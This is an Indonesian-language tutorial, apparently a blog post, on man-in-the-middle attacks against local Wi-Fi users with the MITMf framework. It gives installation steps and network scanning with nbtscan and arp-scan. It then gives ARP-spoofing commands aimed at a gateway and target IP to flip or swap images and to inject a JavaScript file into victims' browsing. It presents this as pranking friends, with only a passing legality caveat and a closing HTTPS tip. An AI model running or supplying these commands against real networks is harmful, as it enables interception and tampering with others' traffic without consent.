Dalam kasus serangan man-in-the-middle, kita dapat menyalahgunakan kepercayaan ini dengan menyamar sebagai titik akses nirkabel, memungkinkan kita untuk mencegat dan memodifikasi data jaringan.
Ini bisa berbahaya untuk data pribadi, tetapi juga menyenangkan untuk mengerjai teman-teman Anda. Dalam hal ini, kita akan mencegat dan memanipulasi lalu lintas dari dalam jaringan area lokal, sering kali jaringan Wi-Fi terhubung ke router nirkabel. Ingatlah bahwa serangan man-in-the-middle (MitM) masih melibatkan penyadapan dan memodifikasi lalu lintas, dan tanpa izin, ini bisa ilegal tergantung pada yuridiksi Anda sendiri.
- Install MITMf (Man-in-the-Middle Framework)
root:~# apt-get update && apt-get dist-upgrade -y root:~# apt-get install -y git python python2 python-pip python3-pip python-m2crypto python-dev root:~# apt-cache search mitmf root:~# apt-get install -y mitmf- Jika Anda ingin menginstal MITMf dari sumber, Anda dapat mengunduh salinan dari GitHub.
root:~# apt-get install -y python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
root:~# pip install virtualenvwrapper
root:~# mkvirtualenv MITMf -p /usr/bin/python2.7
root:~# git clone https://github.com/byt3bl33d3r/MITMf
root:~# cd MITMf && git submodule init && git submodule update --recursive
root:~# pip install -r requirements.txt
root:~# python mitmf.py --help - Pilihan pertama adalah -i , atau interface jaringan kita. Kita dapat membuat daftar interface jaringan yang tersedia menggunakan ifconfig, jalankan tanpa argumen pada new season 2.
root:~# apt-get install -y iproute net-tools nbtscan netstat-nat arp-scan
root:~# ifconfig root:~# mitmf -i wlan0
root:~# netstat -rn
root:~# nbtscan 192.168.0.1-192.168.0.255
root:~# arp-scan -l - Jika salah satu dari alamat MAC atau nama host itu cocok dengan perangkat target Anda, Anda dapat menentukan IP itu nanti sebagai argumen. Kita mengindikasikan bahwa kita ingin menggunakan plugin spoof dan arp sebelum menentukan gateway jaringan kita setelah bagian (--gateway) dari string. Kita harus menambahkan (--upsidedownternet) untuk menggunakan plugin Upsidedownternet. Plugin ini akan flipping semua gambar secara terbalik sebelum meneruskannya ke pengguna.
- Flipping semua gambar Internet dengan Terbalik 180°.
root:~# mitmf -i wlan0 --spoof --arp --gateway 192.168.0.1 --upsidedownternet - Ganti Setiap Gambar Selanjutnya, pindahkan semua file gambar yang cocok ke subdirektori.
root:~# mv *.jpg images/ root:~# mitmf -i wlan0 --spoof --arp --gateway 192.168.0.1 --imgrand --img-dir /home/user/images/ root:~# mitmf -i wlan0 --spoof --arp --gateway 192.168.0.1 --target 192.168.0.2 --imgrand --img-dir /home/user/images/- Inject HTML & JavaScript Untuk melakukan ini, kita menggunakan plugin injeksi, dikombinasikan dengan file JavaScript atau HTML yang ditentukan, yang terletak di URL atau di jalur file. Dalam contoh ini, kita akan menggunakan flag --inject yang dikombinasikan dengan file JavaScript menggunakan --js-file di bawah ini.
root:~# mitmf -i wlan0 --spoof --arp --gateway 192.168.0.1 --inject --js-file /home/user/script.js - Sebelum menjalankan perintah itu, kita harus membuat file JavaScript atau HTML untuk disuntikkan.
root:~# nano script.js Serangan MitM pada dasarnya hanya mungkin jika seseorang diizinkan di antara klien dan permintaan server. Di luar jaringan lokal, penggunaan enkripsi end-to-end yang hati-hati ketika lalu lintas ditangkap, ia tidak dapat diuraikan. Satu langkah yaitu untuk menegakkan HTTP menggunakan HTTPS dimana saja.
Advertisement
